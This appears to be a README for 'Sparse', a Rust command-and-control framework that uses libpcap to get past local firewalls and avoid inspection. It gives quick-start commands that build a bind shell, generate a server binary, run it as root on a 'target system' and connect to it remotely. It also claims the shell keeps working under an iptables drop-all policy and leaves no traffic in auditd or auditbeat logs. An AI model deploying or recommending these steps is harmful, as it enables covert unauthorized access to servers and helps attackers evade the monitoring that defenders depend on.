Sparse: A Rust C2 framework

Developed using libpcap to enable evading local firewalls and with an eye towards hiding itself from inspection. Deprecated in favor of sparse-v2 before being completely developed; the most significant tool this repository contributes is sparse-05.

This repository weaponizes some of the concepts highlighted in this blog post

Significant Packages

• pcap-sys: A Rust wrapper around the libpcap library for Linux
• nl-sys: A Rust wrapper around the netlink (nl) library on Linux
• sparse-05: A bind shell utility to create bind shells on target servers and connect to them

Development

This environment is designed to be developed in with a Nix developer shell, obtained with nix develop

Bind shell

The most mature implementation of Sparse would be the Sparse version 0.5 bind shell, which has documentation in its appropriate folder.

Quick start:

• Install the Nix package manager on a Linux system: [https://nixos.org/download/]
• Run nix --experimental-features 'nix-command flakes' build .#sparse-05-client
• Generate a Linux server with result/bin/sparse-05-client generate -t linux service-name
• Copy to and run on a target system as root
• Connect to it with result/bin/sparse-05-client connect service-name.scon SERVER_IP:54248
• Set up a firewall to block all inbound connections with iptables -P INPUT DROP, iptables -F INPUT; sparse should still be able to connect and operate
• Run iptstate, auditbeat, or auditd from another session to see that no IP or UDP traffic is being logged by the kernel